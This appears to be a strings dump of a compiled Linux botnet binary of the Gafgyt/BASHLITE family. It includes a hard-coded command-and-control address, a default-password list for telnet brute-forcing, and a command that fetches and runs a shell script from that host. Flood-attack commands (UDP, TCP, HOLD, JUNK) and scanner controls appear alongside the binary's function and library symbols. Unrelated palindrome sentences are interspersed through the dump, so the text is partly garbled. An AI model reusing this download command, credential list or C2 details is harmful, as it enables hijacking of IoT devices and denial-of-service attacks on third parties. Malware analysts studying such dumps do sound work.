PTRh
QVhA
</v	
<suB
<du0
<xu0
<Xu0
<uu-
<cuJ
<rt	
<ru9
alula
;E }
RQSPVW
RQPSV
[^_]
[^_]
j1hl'
SVPh
j1hl'
WVSQ
RQPS
Phx+
< t	
< t	
^8Sh
Y^@u
t6;C
UWVS
ZY[^_]
D$$P
UWVS
\$Hh
D$,P
uT;t$
<0#|$
D$(P
4[^_]
UWVS
E,Z9
Z[^_]
UWVS
u89K
;U,tK
[^_]
UWVS
u99z
[^_]
 h H
D$ Pj
D$ PhPH
UWVS
ZY[^_]
UWVS
[^_]
UWVS
G;<$|
Do nine men interpret Nine men I nod
]XKy
[^_]
UWVS
[^_]
UWVS
(<`v
}1C;<$w
D$(!
ZY[^_]
D$,1
8cu"
Z[^_
ZY@u
UWVS
t:;D$hu
D$p;D$xt*
T$(1
t$0P
UWVS
<\udO
D$4%
D$8@PS
T$8:
T$8:
T$8:
[^_]
UWVS
^8Sh
@t	V
8[^_]
UWVS
[^_]
UWVS
<rt<
<wt5f
<at-
u(jP
 tdh
 [^_]
UWVS
whVUR
[^[^_]
ZY[^_]
UWVS
[^_]
^8Sh
^8Sh
UWVS
\$(f
^8Sh
[^_]
UWVS
[^_]
UWVS
.u5A
Z[^_]
UWVS
4/;5
*;\$
t$4R
\$09
\$09
t$4S
[^_]
t$LQ
VPX[^_
KHZ[_
VHY[^_
[^_]
UWVS
^8Sh
[^_]
UWVS
[^_]
Y[[^_
93.174.93.239:7632
root
admin
login
guest
user
changeme
1234
12345
123456
default
pass
password
(null)
buf: %s
/bin/sh
/proc/cpuinfo
BOGOMIPS
PING
recv: %s
:>%$#
%d.%d.%d.%d
%d.%d.%d.0
ogin:
assword:
ncorrect
cd /tmp; rm -rf c.sh; wget http://93.174.93.239/c.sh; busybox wget http://93.174.93.239/c.sh; sh c.sh
/bin/busybox;echo -e '\147\141\171\146\147\164'
gayfgt
multi-call
REPORT %s:%s:%s
REPORT %s:%s:
Failed opening raw socket.
Failed setting raw headers mode.
Invalid flag "%s"
PONG!
GETLOCALIP
My IP: %s
SCANNER
SCANNER ON | OFF
HOLD
HOLD Flooding %s:%d for %d seconds.
JUNK
JUNK Flooding %s:%d for %d seconds.
UDP Flooding %s for %d seconds.
UDP Flooding %s:%d for %d seconds.
TCP Flooding %s for %d seconds.
KILLATTK
Killed %d.
None Killed.
LOLNOGTFO
8.8.8.8
/proc/net/route
	00000000	
GAYFGT
MAC: %02X:%02X:%02X:%02X:%02X:%02X
fork failed
Failed to connect...
BUILD %s
PONG
%s 2>&1
Link closed by server.
?/proc/stat
/proc/cpuinfo
processor
/sys/devices/system/cpu
/dev/null
CAk[S
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
Degas are we not drawn onward no In union drawn onward to new eras aged
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
.symtab
.strtab
.shstrtab
.init
.text
.fini
.rodata
.eh_frame
.ctors
.dtors
.jcr
.got.plt
.data
.bss
.comment
libc/sysdeps/linux/i386/crti.S
crtstuff.c
__CTOR_LIST__
__DTOR_LIST__
__EH_FRAME_BEGIN__
__JCR_LIST__
__do_global_dtors_aux
completed.4817
p.4815
frame_dummy
object.4829
__CTOR_END__
__DTOR_END__
__FRAME_END__
__JCR_END__
__do_global_ctors_aux
initfini.c
libc/sysdeps/linux/i386/crtn.S
libc/sysdeps/linux/i386/crt1.S
client.c
i.4696
printchar
prints
printi
print
fdopen_pids
hextable
ipState
Beeb
libc/sysdeps/linux/i386/vfork.S
dup2.c
open.c
pipe.c
getpid.c
time.c
fork.c
waitpid.c
select.c
chdir.c
read.c
getdtablesize.c
kill.c
__syscall_fcntl.c
write.c
setsid.c
ioctl.c
_exit.c
sigprocmask.c
close.c
isspace.c
toupper.c
__C_ctype_b.c
__C_ctype_b_data
__C_ctype_toupper.c
__C_ctype_toupper_data
__errno_location.c
puts.c
_stdio.c
__stdio_mutex_initializer.4711
_stdio_streams
_fixed_buffers
_wcommit.c
fputc_unlocked.c
fputs_unlocked.c
fwrite_unlocked.c
strlen.c
strcmp.c
memcpy.c
strcpy.c
memset.c
strchr.c
strstr.c
strtok.c
next_start.1451
isatty.c
tcgetattr.c
ntohl.c
God A red nugget A fat egg under a dog
inet_ntoa.c
buf.3070
inet_makeaddr.c
connect.c
getsockname.c
getsockopt.c
recv.c
send.c
sendto.c
setsockopt.c
socket.c
sigaddset.c
sigempty.c
signal.c
sigsetops.c
malloc.c
__malloc_largebin_index
free.c
__malloc_trim
abort.c
mylock
been_there_done_that
rand.c
random.c
unsafe_state
randtbl
random_r.c
random_poly_info
atol.c
strtol.c
_stdlib_strto_l.c
exit.c
sleep.c
sysconf.c
nprocessors_onln
execl.c
__uClibc_main.c
__pthread_return_0
__check_one_fd
__syscall_error.c
sigaction.c
__restore_rt
__restore
libc/sysdeps/linux/i386/mmap.S
wait4.c
execve.c
__socketcall.c
getpagesize.c
getuid.c
clock_getres.c
getrlimit.c
getegid.c
geteuid.c
sbrk.c
getgid.c
munmap.c
nanosleep.c
__syscall_rt_sigaction.c
closedir.c
opendir.c
fd_to_DIR
C.11.3599
readdir64.c
errno.c
parse_config.c
fclose.c
fopen.c
_WRITE.c
_fopen.c
_fwrite.c
Borrow or rob
_trans2w.c
_uintmaxtostr.c
fgetc.c
fgets.c
fflush_unlocked.c
fgetc_unlocked.c
fgets_unlocked.c
strrchr.c
strchrnul.c
strtok_r.c
strcspn.c
memrchr.c
strspn.c
strpbrk.c
inet_aton.c
raise.c
calloc.c
realloc.c
dl-support.c
brk.c
fstat.c
xstatconv.c
mremap.c
getdents64.c
fseeko.c
fseeko64.c
_READ.c
_adjust_pos.c
_rfill.c
_trans2r.c
_cs_funcs.c
rawmemchr.c
llseek.c
__fini_array_end
__fini_array_start
__init_array_end
__preinit_array_end
_GLOBAL_OFFSET_TABLE_
__init_array_start
__preinit_array_start
__GI_execve
__libc_sigaction
strcpy
recvLine
__GI_sigaddset
__socketcall
__GI___ctype_b
waitpid
__GI_fopen
getrlimit
ioctl
_stdio_openlist_use_count
__GI_initstate_r
__GI_sigaction
strtok_r
__GI_time
getgid
sysconf
stdout
random
__GI_getpagesize
getdtablesize
__GI_h_errno
fdopendir
__GI___ctype_toupper
putc_unlocked
recv
connect
__GI___uClibc_fini
numpids
sigemptyset
__pthread_mutex_lock
initConnection
__sigdelset
__GI_clock_getres
__xstat32_conv
__uClibc_fini
memrchr
geteuid
__GI_setsid
sendTCP
__GI_strpbrk
__GI_fgetc
__GI_htonl
__stdio_trans2r_o
munmap
__GI_setsockopt
__libc_stack_end
__GI_fclose
__GI_pipe
_uintmaxtostr
__libc_fcntl
atol
_h_errno
getRandomPublicIP
getc_unlocked
__ctype_b
__GI_random_r
usernames
errno
getegid
__GI_sbrk
zprintf
__GI___uClibc_init
execve
getpagesize
getpid
__GI_lseek64
setstate_r
fgets
getHost
wildString
getc
memcpy
makeRandomStr
getRandomIP
__GI_fputs_unlocked
execl
Eleele
__GI_fgets
_stdio_openlist_dec_use
sclose
__libc_select
puts
__GI___C_ctype_toupper
__GI_fgetc_unlocked
__libc_nanosleep
trim
__GI_fgets_unlocked
dup2
__pthread_mutex_init
getuid
__GI_htons
malloc
isatty
sleep
__GI_read
random_r
__dso_handle
clock_getres
tcpcsum
fdpclose
socket
__GI_dup2
select
__GI_ntohl
_pthread_cleanup_pop_restore
__GI___libc_fcntl
__GI_memset
__GI_closedir
isspace
__stdio_seek
__GI_strcoll
__GI_write
__ctype_toupper
__libc_read
__GI_opendir
__GI_open
__GI_strchr
sigaddset
__GI_tcgetattr
__environ
mmap
__GI_ntohs
_Exit
makeIPPacket
sockprintf
__GI_inet_ntoa
send
__fgetc_unlocked
abort
__GI_fcntl
__GI_fwrite_unlocked
__GI_getgid
srandom_r
_init
__GI_inet_ntoa_r
__GI_setstate_r
parseHex
strtol
pipe
__libc_lseek64
rawmemchr
__malloc_state
__sigaddset
strrchr
nanosleep
__GI_send
h_errno
calloc
__pthread_mutex_unlock
wait4
__register_frame_info_bases
__GI_exit
__app_fini
csum
__exit_cleanup
rindex
__GI_execl
__GI_srandom_r
__GI___sigismember
write
environ
__GI_close
getBuild
fstat
kill
fputs_unlocked
__pthread_mutex_trylock
__GI___sigaddset
__GI_brk
__GI_nanosleep
__GI_strtok
_stdio_openlist
__GI_sigprocmask
inet_addr
ntohl
__GI_fseek
ourIP
chdir
fseeko
_stdio_openlist_del_count
connectTimeout
setsockopt
bsd_signal
fseek
mremap
__GI_kill
__GI_strcmp
setstate
__stdio_READ
A Santa lives evil at NASA
__GI_toupper
__pthread_initialize_minimal
__GI_recv
__stdin
stdin
__GI_isatty
__progname
_start
__deregister_frame_info_bases
strstr
__GI_ioctl
init_rand
rand
signal
read
__xstat64_conv
getCores
__GI_memcpy
strcoll
_stdio_user_locking
program_invocation_short_name
htonl
sendto
__C_ctype_toupper
StartTheLelz
__GI___C_ctype_b
realloc
__libc_send
currentServer
readdir64
__GI_getrlimit
__GI_strcpy
strtok
__GI___fputc_unlocked
__stdio_adjust_position
malloc_trim
fork
__GI___fcntl_nocancel
__stdio_rfill
gotIP
__GI_sleep
sigaction
_dl_phdr
__GI_getc_unlocked
__uClibc_init
__GI_munmap
__getpagesize
__GI_random
__GI_mremap
__syscall_error
__uclibc_progname
__GI_getegid
__GI_wait4
__malloc_lock
__uClibc_main
sbrk
__rtld_fini
__GI_fork
__libc_close
__GI_getpid
inet_aton
index
_pthread_cleanup_push_defer
processCmd
__sigismember
fopen
__bss_start
__libc_open
__GI_strchrnul
getOurIP
memset
__GI_socket
main
listFork
__stdio_fwrite
negotiate
srand
initstate
fclose
__syscall_rt_sigaction
__xstat_conv
ntohs
sendUDP
inet_ntoa
tcgetattr
time
opendir
__GI_abort
fdpopen
__GI___sigdelset
__stdio_init_mutex
__GI__exit
strcmp
__GI_strrchr
data_start
__GI_sysconf
__h_errno_location
__GI_putc_unlocked
matchPrompt
_stdio_fopen
_fini
__GI_chdir
__vfork
__GI_mmap
fgetc
fdgets
__get_pc_thunk_bx
__GI_select
__libc_waitpid
strcspn
__GI_waitpid
_stdio_term
__GI_signal
stderr
__GI_readdir64
commServer
vfork
__C_ctype_b
srandom
__GI_sendto
__GI_sigemptyset
__libc_fork
__atexit_lock
scanPid
__fcntl_nocancel
rand_cmwc
getsockopt
__GI_fseeko64
fflush_unlocked
__stdio_wcommit
__GI___fgetc_unlocked
fwrite_unlocked
inet_ntoa_r
__pagesize
_stdio_openlist_add_lock
__GI_getdtablesize
_edata
__stdout
__GI_memrchr
__GI_fflush_unlocked
__GI_isspace
__GI_strstr
__GI_fstat
_end
htons
__GI_fputc_unlocked
_sigintr
__GI_strspn
fgetc_unlocked
initstate_r
__GI_connect
__curbrk
Tacocat
_dl_phnum
__errno_location
uppercase
_stdlib_strto_l
exit
__stdio_WRITE
_stdio_init
__GI_geteuid
_dl_aux_init
sendJUNK
_errno
atoi
_stdio_openlist_del_lock
__GI_inet_aton
fgets_unlocked
_exit
szprintf
strspn
__libc_recv
__getdents64
strlen
lseek64
open
program_invocation_name
toupper
__libc_write
__malloc_consolidate
__GI_strtol
__GI_getuid
__GI_strtok_r
__GI_errno
__libc_sendto
__stdio_trans2w_o
__GI_vfork
__GI_config_read
strchr
__GI_rawmemchr
__GI_raise
__data_start
setsid
__GI_inet_addr
__GI_config_open
closedir
_Jv_RegisterClasses
macAddress
__GI___errno_location
fputc_unlocked
strchrnul
readUntil
fcntl
__GI_atoi
fseeko64
__GI_getsockname
close
__GI_config_close
__libc_connect
passwords
__GI_strlen
sendHOLD
mainCommSock
pids
__progname_full
strpbrk
getBogos
raise
free
__GI_strcspn
sigprocmask
__fputc_unlocked
getsockname
